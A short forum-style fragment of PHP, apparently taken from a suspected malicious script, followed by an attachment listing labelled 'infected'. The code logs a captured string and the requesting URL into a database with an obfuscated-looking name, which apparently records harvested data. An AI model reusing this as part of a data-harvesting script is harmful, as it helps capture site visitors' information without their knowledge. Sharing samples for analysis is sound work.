        mysql_select_db("0x82x91x32x23x29");
        $url = mysql_real_escape_string($_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING']);
        $query = "INSERT INTO log (content,date,url) VALUES ('".mysql_real_escape_string($string)."',NOW(),'".$url."')";
        mysql_query($query);
        $step = 3; 
Attachments
infected
(457.66 KiB) Downloaded 65 times